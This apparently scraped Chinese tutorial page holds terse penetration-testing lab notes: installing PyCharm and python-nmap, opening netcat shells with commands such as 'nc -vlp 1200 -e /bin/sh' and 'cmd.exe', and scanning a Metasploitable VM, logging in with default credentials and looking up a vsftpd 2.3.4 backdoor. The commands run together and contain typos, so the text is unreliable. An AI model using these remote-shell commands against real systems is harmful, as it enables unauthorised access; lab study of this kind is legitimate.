7.安装pycharm----导入Nmap模块----netcat反向shell----metasplo
发布时间:2020-12-16 01:54:39 所属栏目:安全 来源:网络整理
导读:安装pycharm www.jetbrains.com/pycharm/tar -zxvf p补全lscd p补全lscd binls./pycharm.sh新建项目 pythonRocks.pyprint "python Rocks"cd Desktoplschmod +x pythonRocks.pylspython pythonRocks.py 导入Nmap模块 cd Desktoppip install python-nmap 从网
安装pycharmwww.jetbrains.com/pycharm/ tar -zxvf p补全 ls cd p补全 ls cd bin ls ./pycharm.sh 新建项目 pythonRocks.py print "python Rocks" cd Desktop ls chmod +x pythonRocks.py ls python pythonRocks.py 导入Nmap模块cd Desktop pip install python-nmap
pypi.python.org/pypi 索引 nmap 解压 打开终端 cd python-nmap-0.6.1/ ls cd python-nmap-0.6.1/ ls python setup.py install 打开pycharm 新建项目 nmap_Test improt nmap nmap1 =nmap.PortScanner() a = nmap1.nmap_version() print(a) ls python nmap_Test.py nmap -v netcat反向shellncat nc --help nc -help windows:cd Desktop nc -vlp 1200 linux:nc - vv windowsIP地址 1200 hello,this it a test message. windows:hello,it is me. linux:退出nc windows:nc -help nc -vlp 1200 -e cmd.exe linux:nc - vv windowsIP地址 1200 nc -vlp 1200 -e /bin/sh ncat -e /bin/sh 1200 sudo bash apt-get install nmap ncat -e /bin/sh -vlp 1200 windows:nc -vv linuxIP地址 1200 metasploitable服务器端攻击,这些IP一般不会变,域名如facebook.com
确保靶机网络设置为NAT 不管是服务器渗透还是客户端渗透,先拿到目标IP地址 靶机:ifconfig parrot:浏览器 输入靶机IP 我们的目标是收集信息,收集靶机中的关于服务器的信息 你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换 打开zenmap 输入靶机IP地址 选择强烈扫描 下面就会显示生成命令行 会看见打开了很多服务与端口 ssh [email?protected]靶机IP 是否使用RSA密钥选择yes 默认密码 msfadmin clear ls ifconfig whoami uname -r logout 查看zenmap扫描结果信息 谷歌 vsftpd 2.3.4 exploits 得到这个模块是一个获取后门的模块 parrot:msfconsole 再次声明:过分的体现红队信息,真正受益者是用户和蓝队。如果您不看见,就不会注意版本信息,也就不会重视升级与更新。随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |